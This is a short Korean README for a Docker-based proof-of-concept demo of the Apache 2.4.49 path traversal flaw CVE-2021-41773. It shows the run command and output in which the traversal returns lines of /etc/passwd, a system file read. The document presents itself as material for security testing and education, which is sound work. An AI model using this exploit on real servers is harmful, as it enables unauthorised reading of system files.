
Apache HTTP Server 경로 탐색 취약점 CVE-2021-41773에 대한 개념 증명 익스플로잇으로, 보안 테스트 및 교육을 위한 Docker 기반 데모 환경이 포함되어 있습니다.
데모를 위해 docker를 사용한 CVE-2021-41773 PoC
./poc.sh를 실행하세요. docker와 docker-compose가 정상적으로 작동하는지 확인하십시오.
$ ./poc.sh
Creating network "cve-2021-41773-poc_default" with the default driver
Creating cve-2021-41773-poc_web_1 ... done
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
Apache 2.4.49